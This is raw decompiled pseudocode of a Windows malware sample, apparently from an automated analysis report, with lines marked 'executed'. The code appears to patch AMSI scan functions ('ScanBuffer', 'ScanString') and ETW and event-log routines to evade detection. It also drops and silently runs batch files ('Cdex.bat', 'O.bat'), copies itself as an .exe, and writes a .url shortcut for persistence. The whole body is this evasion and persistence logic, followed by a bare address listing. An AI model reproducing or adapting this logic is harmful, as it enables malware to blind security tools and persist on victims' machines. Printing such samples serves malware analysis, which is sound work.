											_t2564 =  *0x256da9c; // 0x0
											 *0x256daa0 = OpenProcess(0x1f0fff, 0xffffffff, _t2564);
											_t2566 =  *0x256daa0; // 0x0
											_push(_t2566);
											L025237E0();
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2000, E02514D64(_v2004));
											_push(_v2000);
											_t3275 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2012, _t3275, 0x252ad5c);
											E02514A98( &_v2008, E02514D64(_v2012));
											_pop(_t3904);
											E025236CC(_v2008, _t3213, _t3904, _t4138);
											_t2582 = E02514DBC(0x256da84);
											_t2583 =  *0x256daa0; // 0x0
											E02523F94(_t2583, _t3213, _t2582, _t4137, _t4138, _t4158);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2016, E02514D64(_v2020));
											_push(_v2016);
											_t3276 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2028, _t3276, 0x252ad5c);
											E02514A98( &_v2024, E02514D64(_v2028));
											_pop(_t3910);
											E025236CC(_v2024, _t3213, _t3910, _t4138);
											E02514A98( &_v2032, "ReportEventA");
											_push(_v2032);
											E02514A98( &_v2036, "advapi32");
											_pop(_t3913);
											E025236CC(_v2036, _t3213, _t3913, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2040, E02514D64(_v2044));
											_push(_v2040);
											_t3277 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2052, _t3277, 0x252ad5c);
											E02514A98( &_v2048, E02514D64(_v2052));
											_pop(_t3918);
											E025236CC(_v2048, _t3213, _t3918, _t4138);
											E02514A98( &_v2056, "SystemFunction035");
											_push(_v2056);
											E02514A98( &_v2060, "advapi32");
											_pop(_t3921);
											E025236CC(_v2060, _t3213, _t3921, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2064, E02514D64(_v2068));
											_push(_v2064);
											_t3278 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2076, _t3278, 0x252ad5c);
											E02514A98( &_v2072, E02514D64(_v2076));
											_pop(_t3926);
											E025236CC(_v2072, _t3213, _t3926, _t4138);
											E02514A98( &_v2080, "ReportEventW");
											_push(_v2080);
											E02514A98( &_v2084, "advapi32");
											_pop(_t3929);
											E025236CC(_v2084, _t3213, _t3929, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2088, E02514D64(_v2092));
											_push(_v2088);
											_t3279 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2100, _t3279, 0x252ad5c);
											E02514A98( &_v2096, E02514D64(_v2100));
											_pop(_t3934);
											E025236CC(_v2096, _t3213, _t3934, _t4138);
										}
									}
								}
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v2104, E02514D64(_v2108));
								_push(_v2104);
								_t3262 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2116, _t3262, 0x252ad5c);
								E02514A98( &_v2112, E02514D64(_v2116));
								_pop(_t3685); // executed
								E025236CC(_v2112, _t3213, _t3685, _t4138);
								_t2033 =  *0x256dce4; // 0x2a51b88
								E02514CB0(_t2033, 0x252ae54);
								if(__eflags == 0) {
									_t2490 =  *0x256dce8; // 0x0
									E02514CB0(_t2490, 0x252ae54);
									if(__eflags != 0) {
										_t2492 =  *0x256dcec; // 0x0
										E02514CB0(_t2492, 0x252ae54);
										if(__eflags != 0) {
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("ScanBuffer");
											E02514C24();
											E02514A98( &_v2120, E02514D64(_v2124));
											_push(_v2120);
											_t3271 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2132, _t3271, 0x252ad5c);
											E02514A98( &_v2128, E02514D64(_v2132));
											_pop(_t3880); // executed
											E025236CC(_v2128, _t3213, _t3880, _t4138); // executed
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v2136, E02514D64(_v2140));
											_push(_v2136);
											_t3272 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v2148, _t3272, 0x252ad5c);
											E02514A98( &_v2144, E02514D64(_v2148));
											_pop(_t3885); // executed
											E025236CC(_v2144, _t3213, _t3885, _t4138); // executed
											__eflags = 0;
											E02512FC4(0,  &_v2152);
											_push(_v2152);
											_t2526 = E02514DBC(0x256da84);
											_pop(_t2527); // executed
											E025248A4(_t2527, _t3213, _t2526, _t4138, _t4158); // executed
										}
									}
								}
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push(0x252b020);
								_push(0);
								_push(0x252b02c);
								_push(0);
								_push(0x252b038);
								_push(0);
								_push(0x252b044);
								E02514C24();
								E02514A98( &_v2156, E02514D64(_v2160));
								_push(_v2156);
								_t3263 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2168, _t3263, 0x252ad5c);
								E02514A98( &_v2164, E02514D64(_v2168));
								_pop(_t3691); // executed
								E025236CC(_v2164, _t3213, _t3691, _t4138); // executed
								E02514A98( &_v2172, "ReportEventA");
								_push(_v2172);
								E02514A98( &_v2176, "advapi32");
								_pop(_t3694); // executed
								E025236CC(_v2176, _t3213, _t3694, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v2180, E02514D64(_v2184));
								_push(_v2180);
								_t3264 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2192, _t3264, 0x252ad5c);
								E02514A98( &_v2188, E02514D64(_v2192));
								_pop(_t3699); // executed
								E025236CC(_v2188, _t3213, _t3699, _t4138); // executed
								E02514A98( &_v2196, "SystemFunction035");
								_push(_v2196);
								E02514A98( &_v2200, "advapi32");
								_pop(_t3702); // executed
								E025236CC(_v2200, _t3213, _t3702, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v2204, E02514D64(_v2208));
								_push(_v2204);
								_t3265 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2216, _t3265, 0x252ad5c);
								E02514A98( &_v2212, E02514D64(_v2216));
								_pop(_t3707); // executed
								E025236CC(_v2212, _t3213, _t3707, _t4138); // executed
								E02514A98( &_v2220, "ReportEventW");
								_push(_v2220);
								E02514A98( &_v2224, "advapi32");
								_pop(_t3710); // executed
								E025236CC(_v2224, _t3213, _t3710, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v2228, E02514D64(_v2232));
								_push(_v2228);
								_t3266 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2240, _t3266, 0x252ad5c);
								E02514A98( &_v2236, E02514D64(_v2240));
								_pop(_t3715); // executed
								E025236CC(_v2236, _t3213, _t3715, _t4138); // executed
								E02514A98( &_v2244, "ShellExecuteExA");
								_push(_v2244);
								E02514A98( &_v2248, "shell32");
								_pop(_t3718); // executed
								E025236CC(_v2248, _t3213, _t3718, _t4138); // executed
								E02514A98( &_v2252, "SuspendThread");
								_push(_v2252);
								E02514A98( &_v2256, "kernel32");
								_pop(_t3721);
								E025236CC(_v2256, _t3213, _t3721, _t4138);
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v2260, E02514D64(_v2264));
								_push(_v2260);
								_t3267 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2272, _t3267, 0x252ad5c);
								E02514A98( &_v2268, E02514D64(_v2272));
								_pop(_t3726); // executed
								E025236CC(_v2268, _t3213, _t3726, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("Initialize");
								E02514C24();
								E02514A98( &_v2276, E02514D64(_v2280));
								_push(_v2276);
								_t3268 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2288, _t3268, 0x252ad5c);
								E02514A98( &_v2284, E02514D64(_v2288));
								_pop(_t3731); // executed
								E025236CC(_v2284, _t3213, _t3731, _t4138); // executed
								E02514A98( &_v2292, "WmiReceiveNotificationsW");
								_push(_v2292);
								E02514A98( &_v2296, "advapi32");
								_pop(_t3734); // executed
								E025236CC(_v2296, _t3213, _t3734, _t4138); // executed
								E02514A98( &_v2300, "WmiReceiveNotificationsA");
								_push(_v2300);
								E02514A98( &_v2304, "advapi32");
								_pop(_t3737);
								E025236CC(_v2304, _t3213, _t3737, _t4138);
								E02514A98( &_v2308, "WmiQuerySingleInstanceW");
								_push(_v2308);
								E02514A98( &_v2312, "advapi32");
								_pop(_t3740);
								E025236CC(_v2312, _t3213, _t3740, _t4138);
								E02514A98( &_v2316, "NotifyChangeEventLog");
								_push(_v2316);
								E02514A98( &_v2320, "advapi32");
								_pop(_t3743);
								E025236CC(_v2320, _t3213, _t3743, _t4138);
								E02514A98( &_v2324, "WmiQueryAllDataA");
								_push(_v2324);
								E02514A98( &_v2328, "advapi32");
								_pop(_t3746);
								E025236CC(_v2328, _t3213, _t3746, _t4138);
								E02514A98( &_v2332, "WmiOpenBlock");
								_push(_v2332);
								E02514A98( &_v2336, "advapi32");
								_pop(_t3749);
								E025236CC(_v2336, _t3213, _t3749, _t4138);
								E02514A98( &_v2340, "WmiNotificationRegistrationW");
								_push(_v2340);
								E02514A98( &_v2344, "advapi32");
								_pop(_t3752);
								E025236CC(_v2344, _t3213, _t3752, _t4138);
								E02514A98( &_v2348, "TraceQueryInformation");
								_push(_v2348);
								E02514A98( &_v2352, "advapi32");
								_pop(_t3755);
								E025236CC(_v2352, _t3213, _t3755, _t4138);
								E02514A98( &_v2356, "TraceSetInformation");
								_push(_v2356);
								E02514A98( &_v2360, "advapi32");
								_pop(_t3758);
								E025236CC(_v2360, _t3213, _t3758, _t4138);
								E02514A98( &_v2364, "TraceMessageVa");
								_push(_v2364);
								E02514A98( &_v2368, "advapi32");
								_pop(_t3761);
								E025236CC(_v2368, _t3213, _t3761, _t4138);
								E02514A98( &_v2372, "TraceMessage");
								_push(_v2372);
								E02514A98( &_v2376, "advapi32");
								_pop(_t3764);
								E025236CC(_v2376, _t3213, _t3764, _t4138);
								E02514A98( &_v2380, "TraceEvent");
								_push(_v2380);
								E02514A98( &_v2384, "advapi32");
								_pop(_t3767);
								E025236CC(_v2384, _t3213, _t3767, _t4138);
								E02514A98( &_v2388, "TraceEventInstance");
								_push(_v2388);
								E02514A98( &_v2392, "advapi32");
								_pop(_t3770);
								E025236CC(_v2392, _t3213, _t3770, _t4138);
								E02514A98( &_v2396, "SetTraceCallback");
								_push(_v2396);
								E02514A98( &_v2400, "advapi32");
								_pop(_t3773);
								E025236CC(_v2400, _t3213, _t3773, _t4138);
								E02514A98( &_v2404, "SetSecurityInfo");
								_push(_v2404);
								E02514A98( &_v2408, "advapi32");
								_pop(_t3776);
								E025236CC(_v2408, _t3213, _t3776, _t4138);
								E02514A98( &_v2412, "SetSecurityInfoExA");
								_push(_v2412);
								E02514A98( &_v2416, "advapi32");
								_pop(_t3779);
								E025236CC(_v2416, _t3213, _t3779, _t4138);
								E02514A98( &_v2420, "SetSecurityInfoExW");
								_push(_v2420);
								E02514A98( &_v2424, "advapi32");
								_pop(_t3782);
								E025236CC(_v2424, _t3213, _t3782, _t4138);
								E02514A98( &_v2428, "SetSecurityAccessMask");
								_push(_v2428);
								E02514A98( &_v2432, "advapi32");
								_pop(_t3785);
								E025236CC(_v2432, _t3213, _t3785, _t4138);
								E02514A98( &_v2436, "SetPrivateObjectSecurityEx");
								_push(_v2436);
								E02514A98( &_v2440, "advapi32");
								_pop(_t3788);
								E025236CC(_v2440, _t3213, _t3788, _t4138);
								E02514A98( &_v2444, "SetKernelObjectSecurity");
								_push(_v2444);
								E02514A98( &_v2448, "advapi32");
								_pop(_t3791);
								E025236CC(_v2448, _t3213, _t3791, _t4138);
								E02514A98( &_v2452, "SetFileSecurityW");
								_push(_v2452);
								E02514A98( &_v2456, "advapi32");
								_pop(_t3794);
								E025236CC(_v2456, _t3213, _t3794, _t4138);
								E02514A98( &_v2460, "SetFileSecurityA");
								_push(_v2460);
								E02514A98( &_v2464, "advapi32");
								_pop(_t3797);
								E025236CC(_v2464, _t3213, _t3797, _t4138);
								E02514A98( &_v2468, "SaferSetPolicyInformation");
								_push(_v2468);
								E02514A98( &_v2472, "advapi32");
								_pop(_t3800);
								E025236CC(_v2472, _t3213, _t3800, _t4138);
								E02514A98( &_v2476, "SaferSetLevelInformation");
								_push(_v2476);
								E02514A98( &_v2480, "advapi32");
								_pop(_t3803);
								E025236CC(_v2480, _t3213, _t3803, _t4138);
								E02514A98( &_v2484, "ReportEventW");
								_push(_v2484);
								E02514A98( &_v2488, "advapi32");
								_pop(_t3806);
								E025236CC(_v2488, _t3213, _t3806, _t4138);
								E02514A98( &_v2492, "ReportEventA");
								_push(_v2492);
								E02514A98( &_v2496, "advapi32");
								_pop(_t3809);
								E025236CC(_v2496, _t3213, _t3809, _t4138);
								E02514A98( &_v2500, "ReadEventLogW");
								_push(_v2500);
								E02514A98( &_v2504, "advapi32");
								_pop(_t3812);
								E025236CC(_v2504, _t3213, _t3812, _t4138);
								E02514A98( &_v2508, "ReadEventLogA");
								_push(_v2508);
								E02514A98( &_v2512, "advapi32");
								_pop(_t3815);
								E025236CC(_v2512, _t3213, _t3815, _t4138);
								E02514A98( &_v2516, "OpenEventLogW");
								_push(_v2516);
								E02514A98( &_v2520, "advapi32");
								_pop(_t3818);
								E025236CC(_v2520, _t3213, _t3818, _t4138);
								E02514A98( &_v2524, "OpenEventLogA");
								_push(_v2524);
								E02514A98( &_v2528, "advapi32");
								_pop(_t3821);
								E025236CC(_v2528, _t3213, _t3821, _t4138);
								E02514A98( &_v2532, "SaferRecordEventLogEntry");
								_push(_v2532);
								E02514A98( &_v2536, "advapi32");
								_pop(_t3824);
								E025236CC(_v2536, _t3213, _t3824, _t4138);
								E02514A98( &_v2540, "GetEventLogInformation");
								_push(_v2540);
								E02514A98( &_v2544, "advapi32");
								_pop(_t3827);
								E025236CC(_v2544, _t3213, _t3827, _t4138);
								E02514A98( &_v2548, "ElfReadEventLogW");
								_push(_v2548);
								E02514A98( &_v2552, "advapi32");
								_pop(_t3830);
								E025236CC(_v2552, _t3213, _t3830, _t4138);
								E02514A98( &_v2556, "ElfReadEventLogA");
								_push(_v2556);
								E02514A98( &_v2560, "advapi32");
								_pop(_t3833);
								E025236CC(_v2560, _t3213, _t3833, _t4138);
								E02514A98( &_v2564, "ElfOpenEventLogW");
								_push(_v2564);
								E02514A98( &_v2568, "advapi32");
								_pop(_t3836);
								E025236CC(_v2568, _t3213, _t3836, _t4138);
								E02514A98( &_v2572, "ElfOpenEventLogA");
								_push(_v2572);
								E02514A98( &_v2576, "advapi32");
								_pop(_t3839);
								E025236CC(_v2576, _t3213, _t3839, _t4138);
								E02514A98( &_v2580, "BuildSecurityDescriptorA");
								_push(_v2580);
								E02514A98( &_v2584, "advapi32");
								_pop(_t3842);
								E025236CC(_v2584, _t3213, _t3842, _t4138);
								E02514A98( &_v2588, "BuildImpersonateTrusteeW");
								_push(_v2588);
								E02514A98( &_v2592, "advapi32");
								_pop(_t3845);
								E025236CC(_v2592, _t3213, _t3845, _t4138);
								E02514A98( &_v2596, "BuildSecurityDescriptorW");
								_push(_v2596);
								E02514A98( &_v2600, "advapi32");
								_pop(_t3848);
								E025236CC(_v2600, _t3213, _t3848, _t4138);
								E02514A98( &_v2604, "AccessCheckByType");
								_push(_v2604);
								E02514A98( &_v2608, "advapi32");
								_pop(_t3851);
								E025236CC(_v2608, _t3213, _t3851, _t4138);
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanBuffer");
								E02514C24();
								E02514A98( &_v2612, E02514D64(_v2616));
								_push(_v2612);
								_t3269 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2624, _t3269, 0x252ad5c);
								E02514A98( &_v2620, E02514D64(_v2624));
								_pop(_t3856); // executed
								E025236CC(_v2620, _t3213, _t3856, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v2628, E02514D64(_v2632));
								_push(_v2628);
								_t3270 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v2640, _t3270, 0x252ad5c);
								E02514A98( &_v2636, E02514D64(_v2640));
								_pop(_t3861); // executed
								E025236CC(_v2636, _t3213, _t3861, _t4138); // executed
								E02514A98( &_v2644, "NtCreateFile");
								_push(_v2644);
								E02514A98( &_v2648, "ntdll");
								_pop(_t3864); // executed
								E025236CC(_v2648, _t3213, _t3864, _t4138); // executed
								E02514A98( &_v2652, "EtwEventWriteEx");
								_push(_v2652);
								E02514A98( &_v2656, "ntdll");
								_pop(_t3867);
								E025236CC(_v2656, _t3213, _t3867, _t4138);
								E02514A98( &_v2660, "NtOpenFile");
								_push(_v2660);
								E02514A98( &_v2664, "ntdll");
								_pop(_t3870);
								E025236CC(_v2664, _t3213, _t3870, _t4138);
								E02514A98( &_v2668, "EtwEventWrite");
								_push(_v2668);
								E02514A98( &_v2672, "ntdll");
								_pop(_t3873);
								E025236CC(_v2672, _t3213, _t3873, _t4138);
								ExitProcess(0); // executed
								goto L51;
							} else {
								_push( *0x256da90);
								_push(0x252ae60);
								_push("Null");
								E02514C24();
								E02514A98( &_v1124, E02514D64(_v1128));
								_t2766 = E02518110(_v1124);
								__eflags = _t2766;
								if(_t2766 != 0) {
									goto L38;
								} else {
									E02514A98( &_v1132, "C:\\Windows\\SysWOW64");
									_t2770 = E02518134(_v1132);
									__eflags = _t2770;
									if(_t2770 != 0) {
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanBuffer");
										E02514C24();
										E02514A98( &_v1552, E02514D64(_v1556));
										_push(_v1552);
										_t3285 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1564, _t3285, 0x252ad5c);
										E02514A98( &_v1560, E02514D64(_v1564));
										_pop(_t3978);
										E025236CC(_v1560, _t3213, _t3978, _t4138);
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanString");
										E02514C24();
										E02514A98( &_v1568, E02514D64(_v1572));
										_push(_v1568);
										_t3286 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1580, _t3286, 0x252ad5c);
										E02514A98( &_v1576, E02514D64(_v1580));
										_pop(_t3983);
										E025236CC(_v1576, _t3213, _t3983, _t4138);
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanString");
										E02514C24();
										E02514A98( &_v1584, E02514D64(_v1588));
										_push(_v1584);
										_t3287 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1596, _t3287, 0x252ad5c);
										E02514A98( &_v1592, E02514D64(_v1596));
										_pop(_t3988);
										E025236CC(_v1592, _t3213, _t3988, _t4138);
										 *0x256da98 = E02513C30(1);
										 *[fs:eax] = _t4141;
										E0251304C(0x64);
										E02517C64( &_v1600);
										_t2820 =  *0x256da98; // 0x2a26c20
										 *((intOrPtr*)( *_t2820 + 0x38))( *[fs:eax], 0x2528745, _t4140);
										E02514C24();
										E02514A98( &_v1604, E02514D64(_v1608));
										_t2827 =  *0x256da98; // 0x2a26c20
										 *((intOrPtr*)( *_t2827 + 0x74))("Null", 0x252ae60,  *0x256da90);
										__eflags = 0;
										_pop(_t3995);
										 *[fs:eax] = _t3995;
										_push(0x252874c);
										_t2830 =  *0x256da98; // 0x2a26c20
										return E02513C60(_t2830);
									} else {
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("Initialize");
										E02514C24();
										E02514A98( &_v1136, E02514D64(_v1140));
										_push(_v1136);
										_t3292 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1148, _t3292, 0x252ad5c);
										E02514A98( &_v1144, E02514D64(_v1148));
										_pop(_t4000);
										E025236CC(_v1144, _t3213, _t4000, _t4138);
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanBuffer");
										E02514C24();
										E02514A98( &_v1152, E02514D64(_v1156));
										_push(_v1152);
										_t3293 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1164, _t3293, 0x252ad5c);
										E02514A98( &_v1160, E02514D64(_v1164));
										_pop(_t4005);
										E025236CC(_v1160, _t3213, _t4005, _t4138);
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanString");
										E02514C24();
										E02514A98( &_v1168, E02514D64(_v1172));
										_push(_v1168);
										_t3294 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1180, _t3294, 0x252ad5c);
										E02514A98( &_v1176, E02514D64(_v1180));
										_pop(_t4010);
										E025236CC(_v1176, _t3213, _t4010, _t4138);
										_push( *0x256da90);
										_push(0x252ae60);
										_push("Cdex.bat");
										E02514C24();
										E02514A98(0x256d8e4, E02514D64(_v1184));
										_push( *0x256da90);
										_push(0x252ae60);
										_push( *0x256dcf8);
										_push("O.bat");
										E02514C24();
										E02514A98(0x256d8ec, E02514D64(_v1188));
										_push( *0x256da90);
										_push(0x252ae60);
										_push( *0x256dcf8);
										_push("t.bat");
										E02514C24();
										E02514A98(0x256d8e8, E02514D64(_v1192));
										_push(0x252ad5c);
										_push( *0x256dcd8);
										_push("ScanString");
										E02514C24();
										E02514A98( &_v1196, E02514D64(_v1200));
										_push(_v1196);
										_t3295 =  *0x256dcd8; // 0x2a51b38
										E02514BB0( &_v1208, _t3295, 0x252ad5c);
										E02514A98( &_v1204, E02514D64(_v1208));
										_pop(_t4021);
										E025236CC(_v1204, _t3213, _t4021, _t4138);
										E02525540(0x252e004,  &_v1212, 0x9a);
										E025148F4(0x256dccc, _v1212);
										_t4024 =  *0x256d8e4; // 0x0
										_t2907 =  *0x256dccc; // 0x0
										E02525698(_t2907, _t3213, _t4024, _t4138);
										E02525540(0x252e0a0,  &_v1216, 0x44d);
										E025148F4(0x256dccc, _v1216);
										_t4027 =  *0x256d8ec; // 0x0
										_t2913 =  *0x256dccc; // 0x0
										E02525698(_t2913, _t3213, _t4027, _t4138);
										E02514C24();
										_t4029 =  *0x256d8e8; // 0x0
										E02525698(_v1220, _t3213, _t4029, _t4138);
										 *0x256da98 = E02513C30(1);
										 *[fs:eax] = _t4141;
										E0251304C(0x64);
										E02517C64( &_v1224);
										_t2925 =  *0x256da98; // 0x2a26c20
										 *((intOrPtr*)( *_t2925 + 0x38))( *[fs:eax], 0x252827e, _t4140, " & exit",  *0x256d8ec, "start /min ");
										E02514C24();
										E02514A98( &_v1228, E02514D64(_v1232));
										_t2932 =  *0x256da98; // 0x2a26c20
										 *((intOrPtr*)( *_t2932 + 0x74))("Null", 0x252ae60,  *0x256da90);
										__eflags = 0;
										_pop(_t4036);
										 *[fs:eax] = _t4036;
										_push(E02528285);
										_t2935 =  *0x256da98; // 0x2a26c20
										return E02513C60(_t2935);
									}
								}
							}
						} else {
							_push( *0x256da90);
							_push(0x252ae60);
							_t2937 =  *0x256dcf8; // 0x2a59628
							E02525AC0(_t2937, _t3213, _t3247,  &_v884, _t4137, _t4138);
							_push(_v884);
							_push(".url");
							E02514C24();
							E02514A98( &_v876, E02514D64(_v880));
							if(E02518110(_v876) != 0) {
								goto L31;
							} else {
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v888, E02514D64(_v892));
								_push(_v888);
								_t3302 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v900, _t3302, 0x252ad5c);
								E02514A98( &_v896, E02514D64(_v900));
								_pop(_t4044); // executed
								E025236CC(_v896, _t3213, _t4044, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanBuffer");
								E02514C24();
								E02514A98( &_v904, E02514D64(_v908));
								_push(_v904);
								_t3303 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v916, _t3303, 0x252ad5c);
								E02514A98( &_v912, E02514D64(_v916));
								_pop(_t4049); // executed
								E025236CC(_v912, _t3213, _t4049, _t4138); // executed
								_push( *0x256da90);
								_push(0x252ae60);
								_push( *0x256dcf8);
								E02514C24();
								E02514A98(0x256dcf4, E02514D64(_v920));
								_t2979 =  *0x256dcf4; // 0x2a2da98
								if((E02518110(_t2979) ^ 0x00000001) == 1) {
									_t3098 =  *0x256dcf4; // 0x2a2da98
									E02514A98( &_v924, E02514D64(_t3098));
									_t3102 =  *0x256da88; // 0x7f570018, executed
									E02525698(_t3102, _t3213, _v924, _t4138); // executed
								}
								_push( *0x256da90);
								_push(0x252ae60);
								_push( *0x256dcf8);
								_push(".exe");
								E02514C24();
								E02514A98(0x256d8dc, E02514D64(_v928));
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanBuffer");
								E02514C24();
								E02514A98( &_v932, E02514D64(_v936));
								_push(_v932);
								_t3304 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v944, _t3304, 0x252ad5c);
								E02514A98( &_v940, E02514D64(_v944));
								_pop(_t4058); // executed
								E025236CC(_v940, _t3213, _t4058, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v948, E02514D64(_v952));
								_push(_v948);
								_t3305 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v960, _t3305, 0x252ad5c);
								E02514A98( &_v956, E02514D64(_v960));
								_pop(_t4063); // executed
								E025236CC(_v956, _t3213, _t4063, _t4138); // executed
								_t3015 =  *0x256d8dc; // 0x2a43480
								_t3016 = E02514D64(_t3015);
								E02512FC4(0,  &_v964);
								CopyFileA(E02514D64(_v964), _t3016, 0xffffffff); // executed
								E02514A98( &_v968, "CopyFileA");
								_push(_v968);
								E02514A98( &_v972, "kernel32");
								_pop(_t4067); // executed
								E025236CC(_v972, _t3213, _t4067, _t4138); // executed
								E02514A98( &_v976, "NtOpenFile");
								_push(_v976);
								E02514A98( &_v980, "ntdll");
								_pop(_t4070);
								E025236CC(_v980, _t3213, _t4070, _t4138);
								E02514A98( &_v984, "EtwEventWrite");
								_push(_v984);
								E02514A98( &_v988, "ntdll");
								_pop(_t4073);
								E025236CC(_v988, _t3213, _t4073, _t4138);
								_t3044 =  *0x256d8dc; // 0x2a43480
								E0252540C(_t3044, _t3213, 0x252aec8, 0x252ae60, _t4137, _t4138,  &_v992);
								E025148F4(0x256d8f0, _v992);
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v996, E02514D64(_v1000));
								_push(_v996);
								_t3307 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1008, _t3307, 0x252ad5c);
								E02514A98( &_v1004, E02514D64(_v1008));
								_pop(_t4080); // executed
								E025236CC(_v1004, _t3213, _t4080, _t4138); // executed
								 *0x256da98 = E02513C30(1);
								 *[fs:eax] = _t4141;
								_t3065 =  *0x256da98; // 0x2a26c20
								 *((intOrPtr*)( *_t3065 + 0x38))( *[fs:eax], 0x2527bb9, _t4140);
								E02514C24();
								_t3068 =  *0x256da98; // 0x2a26c20
								 *((intOrPtr*)( *_t3068 + 0x38))(0x252af04,  *0x256d8f0, "URL=file:\"");
								E0251304C(0x3a);
								E02517C64( &_v1020);
								E02514BB0( &_v1016, _v1020, "IconIndex=");
								_t3076 =  *0x256da98; // 0x2a26c20
								 *((intOrPtr*)( *_t3076 + 0x38))();
								E0251304C(0x63);
								E02517C64( &_v1028);
								E02514BB0( &_v1024, _v1028, "HotKey=");
								_t3084 =  *0x256da98; // 0x2a26c20
								 *((intOrPtr*)( *_t3084 + 0x38))();
								_t3086 =  *0x256dcf8; // 0x2a59628
								E02525AC0(_t3086, _t3213,  *_t3084,  &_v1040, _t4137, _t4138);
								E02514C24();
								E02514A98( &_v1032, E02514D64(_v1036));
								_t3093 =  *0x256da98; // 0x2a26c20
								 *((intOrPtr*)( *_t3093 + 0x74))(".url", _v1040, 0x252ae60,  *0x256da90);
								_pop(_t4095);
								 *[fs:eax] = _t4095;
								_push(E02527BC0);
								_t3096 =  *0x256da98; // 0x2a26c20
								return E02513C60(_t3096); // executed
							}
						}
					}
				}
			}
































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                0x02525de4
                                                                0x02525de4
                                                                0x02525de4
                                                                0x02525de4
                                                                0x02525de5
                                                                0x02525de7
                                                                0x02525dec
                                                                0x02525dec
                                                                0x02525dee
                                                                0x02525df0
                                                                0x02525df0
                                                                0x02525df3
                                                                0x02525df4
                                                                0x02525df7
                                                                0x02525df8
                                                                0x02525dfd
                                                                0x02525e00
                                                                0x02525e0e
                                                                0x0252a7b8
                                                                0x0252a7b8
                                                                0x0252a7ba
                                                                0x0252a7bd
                                                                0x0252a7c0
                                                                0x0252a7d0
                                                                0x0252a7e0
                                                                0x0252a7eb
                                                                0x0252a7fb
                                                                0x0252a80b
                                                                0x0252a81b
                                                                0x0252a82b
                                                                0x0252a83b
                                                                0x0252a846
                                                                0x0252a84c
                                                                0x0252a85c
                                                                0x0252a867
                                                                0x0252a86d
                                                                0x0252a87d
                                                                0x0252a888
                                                                0x0252a88e
                                                                0x0252a89e
                                                                0x0252a8ae
                                                                0x0252a8b9
                                                                0x0252a8c4
                                                                0x0252a8d9
                                                                0x02525e14
                                                                0x02525e14
                                                                0x02525e21
                                                                0x02525e29
                                                                0x02525e32
                                                                0x02525e3a
                                                                0x02525e3b
                                                                0x02525e48
                                                                0x02525e50
                                                                0x02525e59
                                                                0x02525e61
                                                                0x02525e62
                                                                0x02525e6f
                                                                0x02525e77
                                                                0x02525e80
                                                                0x02525e88
                                                                0x02525e89
